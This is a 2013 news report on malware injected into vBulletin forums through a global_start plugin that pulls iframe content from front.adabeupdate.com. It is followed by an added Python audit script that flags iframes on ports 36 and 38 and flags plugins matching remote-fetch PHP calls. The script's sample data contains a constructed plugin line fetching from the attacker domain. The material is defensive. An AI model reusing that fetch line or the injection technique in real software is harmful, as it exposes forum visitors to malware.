Sucuri researchers say cybercriminals are exploiting critical vulnerabilities

Jul 8, 2013 12:46 GMT

As many as 150,000 websites powered by the popular vBulletin forum platform might have been hacked and abused to serve malware to their visitors.

Experts from Sucuri have found that cybercriminals are exploiting serious vulnerabilities in older versions of vBulletin to hijack the forums.

“[The malware] uses the Plugin system and hooks into ‘global_start’, so it is called on every page request,” Sucuri CTO Daniel Cid explained in a blog post.

The PHP code that’s injected is designed to contact front.adabeupdate.com and retrieve content from it.

“This allows the malware to be injected to the forum pages and pushed down to the visitors of the web site via iFrames. The content is all remotely generated, changing very often, but the format is always the same,” Cid added.

The size of the campaign has been determined based on the number of sites found by Google to contain a certain error during a period when the server that hosted one of the malicious domains was taken down.

Google indexed over 15,000 pages, but since not all sites have “display_errors” enabled, experts estimate that the total number of compromised websites could be at least 10 times higher.

So how can you protect yourself against such attacks? The most important thing is to make sure your vBulletin installation is always up to date.

In addition, users are advised to check their template and plugin lists to make sure there aren’t any malicious components. Sucuri’s website scanner is a great tool to check if a website has been compromised.

Also, since the malicious iFrames always use ports 36 and 38, Internet service providers (ISPs) can protect their customers by blocking the two ports externally.
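The plugin-list check and the port observation above can be turned into a quick audit. The following is an added example, not code from Sucuri or vBulletin: it flags iframes on ports 36 and 38 (or under the named domain) in a saved page, and flags global_start plugins in an exported plugin list. The field names `title`, `hookname` and `phpcode`, the remote-fetch heuristic and all sample data are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

C2_DOMAIN = "adabeupdate.com"   # parent of the host named in the article
IFRAME_PORTS = {36, 38}         # ports the article says the iframes use
HOOK = "global_start"           # hook the injected plugin attaches to
# Heuristic (assumption): PHP calls commonly used to pull remote content.
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_exec|fsockopen)\s*\(", re.I)

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "iframe" and src:
            self.sources.append(src)

def suspicious_iframes(html):
    """Return iframe URLs on port 36/38 or hosted under C2_DOMAIN."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for src in collector.sources:
        url = urlsplit(src)
        host = (url.hostname or "").lower()
        try:
            port = url.port
        except ValueError:      # malformed port in the URL
            port = None
        if port in IFRAME_PORTS or host == C2_DOMAIN or host.endswith("." + C2_DOMAIN):
            hits.append(src)
    return hits

def suspicious_plugins(plugins):
    """Return titles of global_start plugins that name the domain or fetch remotely."""
    return [p["title"] for p in plugins if p["hookname"] == HOOK and
            (C2_DOMAIN in p["phpcode"].lower() or REMOTE_FETCH.search(p["phpcode"]))]

# Constructed sample data, not taken from a real forum.
SAMPLE_HTML = ('<iframe src="http://cdn.example.net:38/a.html"></iframe>'
               '<iframe src="https://video.example.org/embed/1"></iframe>')
SAMPLE_PLUGINS = [
    {"title": "Plugin A", "hookname": "global_start", "phpcode": "$n = count($list);"},
    {"title": "Plugin B", "hookname": "global_start",
     "phpcode": "$c = file_get_contents('http://front.adabeupdate.com/');"},
    {"title": "Plugin C", "hookname": "forumhome_start", "phpcode": "curl_exec($ch);"},
]
```

A hit from either function is a reason to review that plugin or page by hand, not proof of compromise, since legitimate plugins can also fetch remote content.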